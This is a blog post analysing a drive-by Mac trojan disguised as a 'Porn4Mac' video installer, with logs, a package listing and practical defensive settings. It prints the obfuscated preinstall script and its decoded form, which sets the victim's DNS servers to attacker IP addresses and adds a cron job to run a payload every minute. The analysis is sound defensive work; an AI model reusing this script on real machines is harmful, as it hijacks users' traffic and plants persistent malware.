The latest xkcd makes a reference to Harrison Ford and ESB1 which I failed to grasp. In an effort to comprehend I asked Google and was directed to this site. Following my nose led me here which in turn directed me to a fake YouTube site.
When I clicked on the fake YouTube widget to view the video as prompted, I noticed Finder mount a DMG image in the background and Installer try to install something. I've become so relaxed about security on my Mac that it took a second for me to even realise that something bad was in the process of happening. Fortunately, before I had time to react, the Installer application crashed.
This means that Safari automatically downloaded and mounted a DMG from an unknown and untrusted web site, and then ran the included installer package without asking for permission. This is not cool. Fortunately protecting yourself from this is pretty straight forward:
- In "Safari - Preferences - General" make sure that "Open safe files after downloading" is not ticked.
- In "System Preferences - Accounts - <your account name>" make sure that "Allow user to administer this computer" is not ticked.
The first means that after downloading a file Safari will never automatically run it, this is a minor inconvenience but means that nothing can be run without your explicit request (eg. double clicking the file).
The second means that if something does get run, the program won't have permissions to do anything which requires admin privileges. This won't stop it from deleting all your personal data, but it will stop it from messing with any system settings.
I've put a copy of the DMG up on my website in case anybody wants to download it and have a look. For those that are curious about what I found when I started to poke around, keep reading.
These lines were generated in "/var/log/system.log":
Aug 30 21:54:14 overkill kernel[0]: Safari[303] Unable to clear quarantine `install.pkg': 30
Aug 30 21:54:17 overkill Installer[16295]: An uncaught exception was raised
Aug 30 21:54:17 overkill Installer[16295]: *** -[NSCFArray removeObjectAtIndex:]: index (1) beyond bounds (1)
Aug 30 21:54:17 overkill Installer[16295]: *** Terminating app due to uncaught exception 'NSRangeException', reason: '*** -[NSCFArray removeObjectAtIndex:]: index (1) beyond bounds (1)'
Aug 30 21:54:17 overkill Installer[16295]: Stack: (\n 2444165451,\n 2518110459,\n 2444164907,\n 2444164970,\n 2496036639,\n 2495531216,\n 2495657399,\n 2417387518,\n 2417386423,\n 273528,\n 158730,\n 2495524637,\n 2495523524,\n 2481334005,\n 2481333682\n)
Aug 30 21:54:35 overkill ReportCrash[16298]: Formulating crash report for process Installer[16295]
Aug 30 21:54:36 overkill com.apple.launchd[100] ([0x0-0x213213].com.apple.installer[16295]): Exited abnormally: Trace/BPT trap
Aug 30 21:54:43 overkill ReportCrash[16298]: Saved crashreport to /Users/adam/Library/Logs/CrashReporter/Installer_2008-08-30-215417_overkill.crash using uid: xxxx gid: yyyy, euid: xxxx egid: yyyy
Aug 30 21:55:10 overkill /usr/sbin/ocspd[16314]: starting
Aug 30 21:55:11 overkill SubmitReport[16311]: Submitted compressed crash report for Installer
In my "~/Downloads/" directory I had a file called "1023.dmg", the file metadata tells me that it was downloaded from "http://64.28.190.22/download/1023.dmg, http://immenseclips.com/m6/movie1.php?id=1658&n=teen".
The DMG mounted itself at "/Volumes/153" and contained a single package called "install.pkg" with these contents:
overkill(adam)$ find /Volumes/153/install.pkg -ls
19 0 drwxr-xr-x 3 adam user 102 Mar 12 00:37 /Volumes/153/install.pkg
20 0 drwxr-xr-x 7 adam user 238 Mar 12 00:37 /Volumes/153/install.pkg/Contents
21 72 -r--r--r-- 1 adam user 35866 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Archive.bom
22 8 -r--r--r-- 1 adam user 3027 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Archive.pax.gz
23 8 -r--r--r-- 1 adam user 1326 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Info.plist
24 8 -r--r--r-- 1 adam user 8 Mar 12 00:37 /Volumes/153/install.pkg/Contents/PkgInfo
25 0 drwxr-xr-x 12 adam user 408 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources
26 8 lrwxr-xr-x 1 adam user 14 Mar 12 23:36 /Volumes/153/install.pkg/Contents/Resources/153.bom -> ../Archive.bom
27 8 lrwxr-xr-x 1 adam user 17 Mar 12 23:36 /Volumes/153/install.pkg/Contents/Resources/153.pax.gz -> ../Archive.pax.gz
28 8 -r--r--r-- 1 adam user 45 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/153.sizes
29 8 -r--r--r-- 1 adam user 554 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/BundleVersions.plist
30 0 drwxr-xr-x 5 adam user 170 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/English.lproj
31 8 -r--r--r-- 1 adam user 312 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/English.lproj/153.info
32 8 -rw-r--r-- 1 adam user 342 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/English.lproj/Description.plist
33 16 -rwxr-xr-x 1 adam user 8027 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/English.lproj/License.txt
34 8 -r--r--r-- 1 adam user 17 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/package_version
35 8 -rwxr-xr-x 1 adam user 98 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/postinstall
36 8 -rwxr-xr-x 1 adam user 98 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/postupgrade
37 8 -rwxr-xr-x 1 adam user 762 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/preinstall
38 8 -rwxr-xr-x 1 adam user 762 Mar 12 00:37 /Volumes/153/install.pkg/Contents/Resources/preupgrade
The "Archive.bom" claims that it will install these files (none of which actually exist as far as I can tell):
overkill(adam)$ lsbom Archive.bom
. 40777 501/501
./Mozillaplug.plugin 40775 0/80
./Mozillaplug.plugin/Contents 40775 0/80
./Mozillaplug.plugin/Contents/Info.plist 100664 0/80 930 1525506808
./Mozillaplug.plugin/Contents/MacOS 40775 0/80
./Mozillaplug.plugin/Contents/MacOS/VerifiedDownloadPlugin 100775 0/80 24584 1275209212
./Mozillaplug.plugin/Contents/Resources 40775 0/80
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc 100644 0/80 381 3665281426
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.ROVE 100664 0/80 381 2963929028
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.bak 100644 0/80 338 3415230991
./Mozillaplug.plugin/Contents/version.plist 100664 0/80 471 2911002047
./QuickTime.xpt 100755 0/501 762 3209000961
./plugins.settings 100755 0/501 659 869060121
./sendreq 100644 0/501 1214 2574454577
It all looked pretty boring until I found references to "Porn4Mac" in the "Info.plist" and "Description.plist" files:
<key>IFPkgDescriptionDescription</key>
<string>Its a suppa puppa desc yo</string>
<key>IFPkgDescriptionTitle</key>
<string>Porn4Mac</string>
and discovered that the "pre{install,upgrade}" files were "encrypted":
overkill(adam)$ cat preinstall
#!/bin/sh
x=`cat "$0" |wc -l|awk '{print $1}'`;x=`expr $x - 2`;tail -$x "$0" |tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv>1;s1=cx.zxx.aax.zr;s2=cx.zxx.aaz.ea;sh 1 `echo $s1|tr qazwsxedcr 0123456789` `echo $s2| tr qazwsxedcr 0123456789`;exit;
#!/bpf/oy
daxy="/Lpbjajc/Ifxkjfkx Pivt-Ifo"
PSID=$( (/voj/obpf/olvxpi | tjkd PjphajcSkjsplk | okq -k 'o/.*PjphajcSkjsplk : //')<< EOF
ndkf
tkx Sxaxk:/Nkxwnjg/Ginbai/IPs4
q.oynw
uvpx
EOF
)
/voj/obpf/olvxpi << EOF
ndkf
q.pfpx
q.aqq SkjskjAqqjkooko * $1 $2
okx Sxaxk:/Nkxwnjg/Skjsplk/$PSID/DNS
uvpx
EOF
kepox=`ljnfxab -i|tjkd QvplgTphk.edx`
pr [ "$kepox" == "" ]; xykf
klyn "* * * * * \"$daxy/QvplgTphk.edx\">/qks/fvii 2>&1" > ljnf.pfox
ljnfxab ljnf.pfox
jh -jr ljnf.pfox
rp
jh -jr "$0"
That's suspicious, so now I'm curious and want to know what it's
doing 
Basically it decrypts the script to a file called "1" and then executes and passes the IP addresses "85.255.115.29" and "85.255.112.61" through as the variables $1 and $2.
The script itself tries to use scutil to set your DNS servers to the passed IP addresses. It then tries to create a cronjob to run a file called "/Library/Internet\ Plug-Ins/Quicktime.xpt" every minute. I think it means to copy itself to Quicktime.xpt but I can't actually find where it does that.
overkill(adam)$ s1=cx.zxx.aax.zr; s2=cx.zxx.aaz.ea; echo $s1 | tr qazwsxedcr 0123456789; echo $s2 | tr qazwsxedcr 0123456789
85.255.115.29
85.255.112.61
overkill(adam)$ x=`cat preinstall | wc -l | awk '{print $1}'`; x=`expr $x - 2`; tail -$x "preinstall" | tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv
#!/bin/sh
path="/Library/Internet Plug-Ins"
PSID=$( (/usr/sbin/scutil | grep PrimaryService | sed -e 's/.*PrimaryService : //')<< EOF
open
get State:/Network/Global/IPv4
d.show
quit
EOF
)
/usr/sbin/scutil << EOF
open
d.init
d.add ServerAddresses * $1 $2
set State:/Network/Service/$PSID/DNS
quit
EOF
exist=`crontab -l|grep QuickTime.xpt`
if [ "$exist" == "" ]; then
echo "* * * * * \"$path/QuickTime.xpt\">/dev/null 2>&1" > cron.inst
crontab cron.inst
rm -rf cron.inst
fi
rm -rf "$0"
So that's that. It totally failed to work on my Mac but that's mostly luck, I strongly recommend to everybody out there that you take the precautions I mention above to stop a future attack being successful.
I do have a couple unanswered questions (it's late so possibly it'll be obvious in the morning):
- I understand why the DMG got automatically mounted, but why did Installer automatically run the installer program?
- Where is Quicktime.xpt supposed to come from? Other then the cronjob which is supposed to run it, I can't see any mention of it or anywhere that it gets created/copied?
- I don't show it above but the postinstall script references a file called "sendreq", again I can't figure out what is supposed to create it?
- What does it mean that the DMG shows as being downloaded from two different sites? I've never seen that before ...
An unexpected, but interesting, distraction for the night!
UPDATE: Apparently this is old news and has been thoroughly discussed elsewhere. It does appear that the version I found is slightly different then the ones being discussed online but it's very similar.
- Yes I realise that I lose nearly infinite nerd points for not instantaneously realising that ESB stands for "Empire Strikes Back".